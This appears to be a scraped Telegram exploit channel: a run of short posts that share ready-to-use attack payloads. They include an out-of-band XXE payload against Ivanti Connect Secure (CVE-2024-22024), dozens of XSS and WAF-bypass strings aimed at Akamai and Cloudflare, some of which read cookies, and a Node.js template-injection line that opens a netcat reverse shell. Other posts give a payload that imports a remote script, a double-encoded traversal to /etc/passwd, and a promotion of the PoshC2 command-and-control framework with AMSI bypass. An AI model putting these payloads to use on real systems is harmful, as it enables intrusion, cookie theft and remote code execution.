0Day.Today | Learn Exploit | Zero World | Dark web

0Day.Today | Learn Exploit | Zero World | Dark web |

CVE-2024-22024 - XXE on Ivanti Connect Secure

payload encoded base64:

&lt;?xml version="1.0" ?&gt;&lt;!DOCTYPE root [&lt;!ENTITY % xxe SYSTEM "http://{{external-host}}/x"&gt; %xxe;]&gt;&lt;r&gt;&lt;/r&gt;

⚠️ send it to 127.0.0.1/dana-na/auth/saml-sso.cgi with SAMLRequest parm

#CVE #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army

4.6K views07:33

0Day.Today | Learn Exploit | Zero World | Dark web |

Payload Wizard

Link

#Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army

3.2K views07:34

0Day.Today | Learn Exploit | Zero World | Dark web |

XSS of the day : DOM-XSS-SiteMinder

Payload:
\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e

Nuclei tamplete

#Payload #xss
——————‌
0Day.Today
@LearnExploit
@Tech_Army

2.4K views11:36

0Day.Today | Learn Exploit | Zero World | Dark web |

✨

PoshC2

✨

PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming, post-exploitation and lateral movement.

💬

PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools, allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python2/Python3 implants with payloads written in PowerShell v2 and v4, C++ and C# source code, a variety of executables, DLLs and raw shellcode in addition to a Python2/Python3 payload. These enable C2 functionality on a wide range of devices and operating systems, including Windows, *nix and OSX.

📊 Other notable features of PoshC2 include:
⚪️ Consistent and Cross-Platform support using Docker.
⚪️ Highly configurable payloads, including default beacon times, jitter, kill dates, user agents and more.
⚪️ A large number of payloads generated out-of-the-box which are frequently updated.
⚪️ Shellcode containing in-build AMSI bypass and ETW patching for a high success rate and stealth.
⚪️ Auto-generated Apache Rewrite rules for use in a C2 proxy, protecting your C2 infrastructure and maintaining good operational security.
⚪️ A modular and extensible format allowing users to create or edit C#, PowerShell or Python3 modules which can be run in-memory by the Implants.
⚪️ Notifications on receiving a successful Implant via Pushover or Slack.
⚪️ A comprehensive and maintained contextual help and an intelligent prompt with contextual auto-completion, history and suggestions.
⚪️ Fully encrypted communications, protecting the confidentiality and integrity of the C2 traffic even when communicating over HTTP.
⚪️ Client/Server format allowing multiple team members to utilise a single C2 server.

⚪️

😸

Github

⬇️

Download

🔒

LearnExploit

#Payload #C2 #Proxy #Aware

➖

📣

T.me/BugCod3

📣

T.me/LearnExploit

Please open Telegram to view this post

VIEW IN TELEGRAM

2.4K views16:30

0Day.Today | Learn Exploit | Zero World | Dark web |

This payload can be used for Client Side Template injection and Reflected XSS, perhaps a code injection can be triggered in the background

Payload :

'%3e%3cscript%3ealert(5*5)%3c%2fscript%3eejj4sbx5w4o

#Payload #xss
——————‌
0Day.Today
@LearnExploit
@Tech_Army

3.7K views09:46

0Day.Today | Learn Exploit | Zero World | Dark web |

XSS WAF Bypass One payload for all 🔥

Link

#xss #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army

3.0K views07:30

0Day.Today | Learn Exploit | Zero World | Dark web |

XSS payload ⚡️

?msg=%3Csvg%2Fonload%3Dalert%28%22XSS%22%29%20%3E, <svg/onload=alert("XSS") >

?utm_source=abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e ( The payload finished open function calls from jQuery, executes an alert as POC and then finished the original script tag )

<a+HREF="%26%237 javascrip%26%239t: alert%261par;document .domain) *> ( WAF / Cloudflare Bypass )

”/>&_lt;_script>alert(1)&_lt;/scr_ipt>”/> remove the underscores ( filtering using HTML entities for the alternation of <>, because I noticed that it's filtering the )

<a href=[]" onmouseover=prompt(1)//">XYZ</a>

<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/

<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}

<svg> <foreignObject width="100%" height="100%">     <body> <iframe src='javascript:confirm(10)'></iframe>     </body>   </foreignObject> </svg>

<script>var a=document.createElement("a");a.href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==";http://a.click();</script>

( Encoded by chatGPT )

jaVasCript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
"'alert(1)

#XSS #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army

3.2K views08:42

0Day.Today | Learn Exploit | Zero World | Dark web |

Stored Xss payload 🔥

Payload for bypass waf:

<Img Src=OnXSS OnError=confirm("@Learnexploit")>

#xss #Bypass #WAF #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army

3.3K views08:42

0Day.Today | Learn Exploit | Zero World | Dark web |

Xss Payload 💎

j%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At:console.log(location)

#xss #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army

3.1K views09:43

0Day.Today | Learn Exploit | Zero World | Dark web |

XSS could be be triggers in url itself, no need for parameter injection ⚡️

Payloads:

%3Csvg%20onload=alert(%22@Learnexploit88%22)%3E

%3Cimg%20src=x%20onerror=alert(%22@Learnexploit%22)%3E

#Xss #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army

3.2K views10:44

0Day.Today | Learn Exploit | Zero World | Dark web |

If you discover a node.js template area, you should try triggerable node payload 🔥; require('child_process').exec('nc -e sh ip port');{src:/bin/sh/}

so you can get RCE 💎

#rce #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army

3.0K views16:54

0Day.Today | Learn Exploit | Zero World | Dark web |

short XSS polyglot

'/*\'/*"/*\"/*</Script>
<Input/AutoFocus/OnFocus=/**/
(import(/https:\\X55.is/.source))//>

#Xss #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army

3.2K views08:12

0Day.Today | Learn Exploit | Zero World | Dark web |

Stored XSS via cache poisoning ⚡️

"><a nope="%26quot;x%26quot;"onmouseover="Reflect.get(frames,'ale'+'rt')(Reflect.get(document,'coo'+'kie'))">

#XSS #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army

3.2K views09:01

0Day.Today | Learn Exploit | Zero World | Dark web |

Bypassed strong Akamai WAF

payload: '"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](document%2Bcookie)>

#Waf #Bypass #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army

3.0K views06:38

0Day.Today | Learn Exploit | Zero World | Dark web |

payload to bypass Akamai WAF

?foobar=<foo%20bar=%250a%20onclick=<your js code>

#WAF #Bypass #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army

3.2K viewsedited 19:05

0Day.Today | Learn Exploit | Zero World | Dark web |

Forwarded from Root Exploit

Directory Traversal Bypass Payload ⚡️

/../../etc/passwd - 403 Forbidden 🚫

%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd - 200 OK ✅

#Bypass #Payload
——————‌
@Learnexploit
@A3l3_KA4 💎

4.2K views10:16

0Day.Today | Learn Exploit | Zero World | Dark web |

A Cloudflare WAF bypass combining simple (but efficient) tricks

<img%20hrEF="x"%20sRC="data:x,"%20oNLy=1%20oNErrOR=prompt`1>`

A payload with some obfuscation & filter evasion tricks

<img/src/onerror=setTimeout(atob(/YWxlcnQoMTMzNyk/.source))>

#CF #WAF #Bypass #Payload

➖

📣

T.me/BugCod3

📣

T.me/LearnExploit

Please open Telegram to view this post

VIEW IN TELEGRAM

3.0K views17:38

About

Blog

Apps

Platform